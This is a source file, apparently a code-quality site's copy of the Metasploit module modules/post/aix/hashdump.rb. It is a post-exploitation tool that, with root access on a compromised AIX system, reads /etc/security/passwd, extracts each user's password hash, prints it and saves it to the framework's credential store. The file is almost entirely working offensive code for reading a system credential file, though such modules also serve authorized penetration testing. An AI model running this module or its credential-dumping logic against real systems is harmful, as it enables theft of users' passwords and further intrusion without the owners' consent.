modules/post/aix/hashdump.rb from rapid7/metasploit-framework

modules/post/aix/hashdump.rb
Summary

Maintainability

2 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AIX Gather Dump Password Hashes',
        'Description' => %q{ Post Module to dump the password hashes for all users on an AIX System},
        'License' => MSF_LICENSE,
        'Author' => ['theLightCosine'],
        'Platform' => [ 'aix' ],
        'SessionTypes' => [ 'shell' ]
      )
    )
  end

  def run
    if is_root?
      passwd_file = read_file('/etc/security/passwd')

      username = ''
      hash = ''

      passwd_file.each_line do |line|
        user_line = line.match(/(\w+):/)
        if user_line
          username = user_line[1]
        end

        hash_line = line.match(/password = (\w+)/)
        if hash_line
          hash = hash_line[1]
        end

        next unless hash.present?

        print_good "#{username}:#{hash}"
        credential_data = {
          jtr_format: 'des',
          origin_type: :session,
          post_reference_name: refname,
          private_type: :nonreplayable_hash,
          private_data: hash,
          session_id: session_db_id,
          username: username,
          workspace_id: myworkspace_id
        }
        create_credential(credential_data)
        username = ''
        hash = ''
      end

    else
      print_error('You must run this module as root!')
    end
  end
end